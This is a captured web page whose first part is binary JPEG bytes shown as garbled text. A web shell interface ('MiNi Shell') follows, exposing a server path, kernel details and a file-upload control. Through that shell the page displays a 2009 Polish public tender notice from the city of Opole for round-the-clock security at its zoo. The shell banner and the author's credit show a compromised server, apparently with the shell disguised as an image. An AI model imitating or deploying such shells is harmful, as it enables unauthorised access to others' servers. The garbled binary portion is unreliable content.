JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090225/41212-N-2009.html

<p class="kh_header"><b>Opole: Całodobowa ochrona i monitorowanie zwierząt, osób, obiektów i terenu Ogrodu Zoologicznego w Opolu przy ul. Spacerowej 10.</b><br>
<b>Numer ogłoszenia: 41212 - 2009; data zamieszczenia: 25.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Opole Urząd Miasta Opola , Rynek-Ratusz, 45-015 Opole, woj. opolskie, tel. 077 451 19 21, 077 451 19 22, faks 0 77 454 98 44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um.opole</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Całodobowa ochrona i monitorowanie zwierząt, osób, obiektów i terenu Ogrodu Zoologicznego w Opolu przy ul. Spacerowej 10..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest całodobowa ochrona i monitorowanie zwierząt, osób, obiektów i terenu znajdującego się na terenie Ogrodu Zoologicznego w Opolu przy ul. Spacerowej 10. 

2. Zakres   zamówienia obejmuje  między  innymi  wykonywanie  niżej określonych zadań:
a)całodobowa   ochrona   całego  terenu   (24h) i  obiektów  przed włamaniem  i  dewastacją, a    także przed kradzieżą mienia i zwierząt oraz ich okaleczeniem, wrzucaniem jakichkolwiek     przedmiotów na wybiegi zwierząt,
b)wykonywanie  usługi  monitorowania  wizyjnego  obiektów  i  terenu zgodnie z  instrukcją obsługi   systemu   monitorującego.
c)Wykonawca powinien wyposażyć  każdego  pracownika ochrony w  urządzenia do kontroli pracy  strażników  w systemie on-line oraz zainstalować na terenie Ogrodu w miejscach wskazanych  przez Zamawiającego 25 punktów kontrolnych. System powinien przesyłać  w czasie rzeczywistym do centrum dozoru poza obiektem chronionym informacje  o potwierdzeniu przybycia strażnika na punkt kontrolny. Jednocześnie powinna być  zapewniona przez centrum dozoru możliwość automatycznej kontroli przybycia strażnika       w określonym czasie wskazanym wcześniej przez zamawiającego, a w przypadku braku jego obecności w okresie + - 10 minut powinna być zrealizowana procedura sprawdzenia przez centrum dozoru przyczyny braku obecności strażnika na punkcie kontrolnym. Ponadto  system   powinien umożliwiać Zamawiającemu wgląd on- line  (w  czasie rzeczywistym)  poprzez  sieć  Internet do historii potwierdzeń przybycia strażników na punkt kontrolny,
d)opłata  za obsługę  centrum  dozoru  leży  po stronie Wykonawcy i   powinna  być wliczona    w  cenę oferty,
e)wykonywanie czynności portierskich,
f)piesze patrole wyznaczoną przez Zamawiającego trasą, potwierdzone przez elektroniczny system pracy strażnika,
g)skuteczna i adekwatna do zagrożenia interwencja z ewentualnym  wykorzystaniem własnej grupy interwencyjnej w uzasadnionych  przypadkach -  czas przyjazdu do 15 min.(o ile nie wystąpią  przeszkody  wydłużające,  np. blokada drogi w związku z wypadkiem, pożarem, itp.)  lub   za  pomocą wezwanych, stosownych organów, 
h)szybkie i skuteczne reagowanie w przypadku jakichkolwiek awarii, zagrożeń, ze szczególnym  uwzględnieniem bezpieczeństwa zwierząt,
i)ewidencjonowanie w  książce dyżurów wszystkich zdarzeń zaistniałych podczas służby,
j)na wezwanie pracownika kasy nadzór nad sprawnym wchodzeniem i wychodzeniem zwiedzających,
k)	zamykanie o wyznaczonej, wg  potrzeb,  godzinie następujących budynków: 
-małpiarni,
-żyrafiarni, 
-budynek stawonogów,
-budynku DHD,
-i innych wskazanych przez Zamawiającego                                                                             

       l)   wypuszczanie zwiedzających po zamknięciu kas przy kołowrotku.      
3. Wykonawca zapewni jednolite umundurowanie z emblematami agencji dla  pracowników realizujących  zamówienie.
4. Wykonawca    jest   zobowiązany  do   zapoznania   się   i   stosowania    regulaminu   dla zwiedzających     obowiązującego     w    Ogrodzie     Zoologicznym    oraz      przepisów porządkowych   i   BHP   dla    firm   pracujących   na   terenie   Ogrodu    Zoologicznego.

5. Szczegółowy zakres  czynności  i  wymagań  Zamawiającego, będzie zawarty w instrukcji przygotowanej przez Zamawiającego w uzgodnieniu z Wykonawcą po podpisaniu umowy

6. Lokalizacja zadania: Ogród Zoologiczny, 45-094 Opole   ul. Spacerowa 10
7. Zamawiający nie przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt.6 Prawa,

8. Zamawiający nie dopuszcza składania ofert częściowych, wariantowych i nie będzie wybierał najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej,

9. Zamawiający nie przewiduje zmian w umowie.

10. Zamawiający zastrzega sobie możliwość nadzoru nad sprawowaniem ochrony..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym             i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia; 
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 
Dokonanie oceny spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie Wykonawcy oświadczeń i dokumentów. Zamawiający sprawdzi kompletność dokumentów, a następnie dokona sprawdzenia spełnienia warunków według zasady spełnia/nie spełnia, co musi wynikać jednoznacznie z treści oświadczeń i dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunku posiadania uprawnienia do wykonywania działalności Zamawiający żąda złożenia:
 - aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego przez urząd wydający nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ( w przypadku wspólnego ubiegania się  o udzielenie zamówienia przez dwóch lub więcej Wykonawców dokument składa każdy  z nich), Profil  działania Wykonawcy musi odpowiadać przedmiotowi zamówienia, a odpis musi zawierać aktualny wykaz osób upoważnionych do reprezentowania Wykonawcy. 
 - aktualnej  koncesji  na podjęcie działalności gospodarczej w zakresie objętym przedmiotowym   zamówieniem tj. w zakresie ochrony fizycznej mienia (stałej lub doraźnej), obejmującej okres realizacji umowy wydanej przez właściwy organ administracji - MSWiA, a  wymaganej przepisami ustawy o  swobodzie  działalności gospodarczej (DZ. U. z  2004r. Nr173 poz.  1887), w zakresie ochrony osób i mienia wynikających z ustawy z dn. 22 sierpnia 1997r. o ochronie  osób i mienia          z późn. zm.  (Dz. U. Dz 2005r. nr145 poz. 1221  jt. Z póź zm), 

2.1 W celu potwierdzenia spełnienia warunku dysponowania potencjałem technicznym osobami zdolnymi do wykonania  zamówienia Wykonawca  wykaże się posiadaniem następującego personelu: 
 - kierownika ochrony - tj. 1 osobę, która będzie nadzorowała świadczenie usługi  z co najmniej 5 letnim doświadczeniem w zakresie kierowania zespołem pracowników ochrony fizycznej i grup  interwencyjnych, do całodobowej dyspozycji, wyposażony w oznakowany samochód oraz system łączności. 
 - pracowników ochrony fizycznej -    mających   doświadczenie zawodowe i odpowiednie   warunki   psycho- fizyczne,  zatrudnionych  wyłącznie  na umowę o pracę, w tym co najmniej 1 pracownik  ochrony  fizycznej  na  zmianie  musi  posiadać licencję I stopnia  o stażu pracy  w tym zakresie (min. 3 lata), przeszkolonego, wyposażonego w środki przymusu bezpośredniego  oraz  środki  łączności  zapewniające   kontakt  z  grupą  interwencyjną. 
 - pracowników  grupy  interwencyjnej  o doświadczeniu  zawodowym  w przeprowadzeniu    interwencji;  posiadających  licencję I stopnia pracownika ochrony  fizycznej  wynikającą  z   ustawy  dn. 22.08.1997r. o ochronie osób i mienia z  póz. zm.
 - posiadania na terenie miasta Opola grupę  patrolowo-  interwencyjną  przeznaczoną do realizacji niniejszego zadania.  Zabrania   się   korzystania z usług  podwykonawcy.
Na potwierdzenie powyższego Wykonawca załączy dokumenty,  stwierdzające  stosownie  do  art.26 ust 1  ustawy  o ochronie  osób i mienia, posiadanie przez ww. osoby wykonujące zamówienie  osoby, stosownych uprawnień, a także przedłoży kserokopie aktualnych dokumentów  potwierdzających,   że  wykonawca   oraz  co najmniej 6 jego pracowników,  którzy będą realizować zamówienie  posiadające licencje  pracowników ochrony  i stopnia .  
Wzór wykazu załączono do niniejszej specyfikacji.

2.2. W celu potwierdzenia wymogów art. 22 ust. 1 pkt 2 Prawa tj. dysponowania potencjałem technicznym do wykonania zamówienia przez Wykonawcę, Zamawiający na podstawie art. 44 Prawa żąda złożenia wykazu potwierdzającego spełnienie ww. warunku. Warunek zostanie uznany za spełniony, jeżeli :
Wykonawca dysponuje/ będzie dysponować środkami  przymusu  bezpośredniego (tj. kajdanki, pałki obronne wielofunkcyjne), w które będą wyposażeni pracownicy ochrony przy realizacji  przedmiotowego zamówienia, zgodnie z art.38 ust. 2 ustawy z 1997r.o ochronie osób  i mienia). 
Wzór oświadczenia  załączono do niniejszej specyfikacji.

2.3 W celu potwierdzenia spełnienia warunku posiadania niezbędnej wiedzy i doświadczenia               do wykonania zamówienia Zamawiający żąda złożenia wykazu usług wykonanych/wykonywanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem do wykazu dokumentów potwierdzających ich należyte wykonanie.
Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże się wykonaniem/wykonywaniem  co najmniej 3 usług polegających na ochronie osób i mienia oraz monitoringu na obiektach użyteczności publicznej  (w przypadku ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców warunek oceniany będzie łącznie). 
Wzór wykazu załączono do niniejszej specyfikacji.

3. W celu potwierdzenia spełnienia warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej należyte wykonanie zamówienia, Wykonawca wykaże się posiadaniem aktualnej polisy ubezpieczeniowej od odpowiedzialności cywilnej (kontraktowej i deliktowej) w przedmiocie prowadzonej działalności gospodarczej na kwotę minimum 1.000.000 zł. Czas ważności polisy musi obejmować okres, w  którym będzie realizowane  zamówienie . 
W przypadku  jej braku, Wykonawca zobowiązany jest przedłożyć inny dokument  potwierdzający,   ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej  działalności gospodarczej.    
W  przypadku  posiadania  polisy, której termin  obowiązywania nie obejmuje okresu  obowiązywania  umowy, Wykonawca  zobowiązany jest do załączenia oświadczenia, że zobowiązuje się  do zawarcia  umowy ubezpieczenia   w  wysokości określonej poprzednią polisą   na  dalszy okres obowiązującej  umowy z  Zamawiającym. 
W przypadku składania ofert  przez podmioty występujące wspólnie, właściwe dokumenty muszą być złożone przez każdy podmiot z osobna. 

4.W celu potwierdzenia prawa do ubiegania się o zamówienie publiczne Zamawiający żąda złożenia oświadczenia o spełnieniu warunków określonych w art. 24 ust. 1 i 2 Prawa według wzoru załączonego do niniejszej specyfikacji (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców dokument składa każdy z nich)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.um.opole.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Opola, Wydział Inwestycji Miejskich, 45-018 Opole, Plac Wolności 7-8, pok. 118.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2009 godzina 10:00, miejsce: Urząd Miasta Opola, Wydział Inwestycji Miejskich, 45-018 Opole, Plac Wolności 7-8, pok117b.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com